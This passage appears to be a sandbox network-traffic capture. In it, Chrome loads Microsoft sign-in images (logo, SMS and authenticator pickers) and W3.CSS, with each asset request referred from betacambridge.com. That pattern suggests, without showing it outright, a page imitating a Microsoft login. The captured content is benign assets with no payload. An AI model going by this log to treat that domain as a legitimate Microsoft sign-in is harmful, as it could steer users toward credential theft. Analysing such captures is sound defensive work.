                                            2024-11-18 20:15:50 UTC2023INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 29 2c 74 68 69 73 2e 62 61 63 6b 6f 66 66 2e 72 65 73 65 74 28 29 2c 74 68 69 73 2e 5f 72 65 61 64 79 53 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 2c 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 63 6c 6f 73 65 22 2c 65 2c 74 29 2c 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6f 6e 26 26 21 74 68 69 73 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 26 26 74 68 69 73 2e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 63 6f 6e 6e 65 63 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 69 66 28 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 7c 7c 74 68 69 73 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 29 72
                                            Data Ascii: function(e,t){this.cleanup(),this.backoff.reset(),this._readyState="closed",this.emitReserved("close",e,t),this._reconnection&&!this.skipReconnect&&this.reconnect()}},{key:"reconnect",value:function(){var e=this;if(this._reconnecting||this.skipReconnect)r


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.44975213.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC658OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:49 UTC784INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 199
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                            ETag: 0x8DB5C3F49C21D98
                                            x-ms-request-id: 2f5c6997-901e-0079-7349-383f72000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201549Z-164f84587bfn7ppchC1DFW45b400000000hg00000000red5
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:49 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                            Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.44975013.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC653OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                            Host: logincdn.msauth.net
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:49 UTC806INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:49 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 276
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                            ETag: 0x8D79ED35591CF44
                                            x-ms-request-id: ac693482-901e-0056-18c2-3932b9000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201549Z-1866b5c5fbbls4jchC1DFWnmb400000001k000000000rq7h
                                            x-fd-int-roxy-purgeid: 79218156
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:49 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                            Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.449751152.199.21.1754432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:49 UTC661OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                            Host: aadcdn.msftauth.net
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:50 UTC738INHTTP/1.1 200 OK
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Age: 20616122
                                            Cache-Control: public, max-age=31536000
                                            Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                            Content-Type: image/svg+xml
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Etag: 0x8DB5C3F4AC59B47
                                            Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                            Server: ECAcc (lhc/78BB)
                                            Vary: Accept-Encoding
                                            X-Cache: HIT
                                            x-ms-blob-type: BlockBlob
                                            x-ms-lease-status: unlocked
                                            x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                            x-ms-version: 2009-09-19
                                            Content-Length: 1636
                                            Connection: close
                                            2024-11-18 20:15:50 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.449746192.229.133.2214432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:50 UTC546OUTGET /w3css/4/w3.css HTTP/1.1
                                            Host: www.w3schools.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:50 UTC575INHTTP/1.1 200 OK
                                            Age: 22984
                                            Cache-Control: public,max-age=31536000,public
                                            Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                            Content-Type: text/css
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Etag: "0b892bdb339db1:0+ident"
                                            Last-Modified: Mon, 18 Nov 2024 12:16:48 GMT
                                            Server: ECS (lhd/35B3)
                                            Vary: Accept-Encoding
                                            X-Cache: HIT
                                            X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                            X-Powered-By: ASP.NET
                                            Content-Length: 23427
                                            Connection: close
                                            2024-11-18 20:15:50 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                            Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                            2024-11-18 20:15:50 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                            Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.44975813.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:50 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC784INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 673
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                            ETag: 0x8DB5C3F47E260FD
                                            x-ms-request-id: b31c827f-601e-0075-1b33-36dfc5000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201550Z-16547b76f7fbkfmzhC1DFWm9tw00000005y000000000ccag
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:51 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                            Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.44975713.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:50 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC785INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 1435
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                            ETag: 0x8DB5C3F4911527F
                                            x-ms-request-id: beefc06c-301e-002d-5b9d-367025000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201550Z-164f84587bft9l9khC1DFW32rc00000006a000000000a8yz
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:51 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                            Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.44975913.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:50 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC785INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 2407
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                            ETag: 0x8DB5C3F499A9B99
                                            x-ms-request-id: 6158e1f5-201e-0006-7d33-388756000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201550Z-1866b5c5fbbr78bbhC1DFWqz2n00000006ag00000000sgwk
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:51 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                            Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.44976013.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:50 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                            Host: aadcdn.msauth.net
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC805INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 199
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                            ETag: 0x8DB5C3F49C21D98
                                            x-ms-request-id: 2f706e99-601e-0033-04bf-38a350000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201550Z-1866b5c5fbblmqrkhC1DFWf9ns00000004cg00000000feh5
                                            x-fd-int-roxy-purgeid: 4554691
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:51 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                            Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.44976113.107.246.454432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
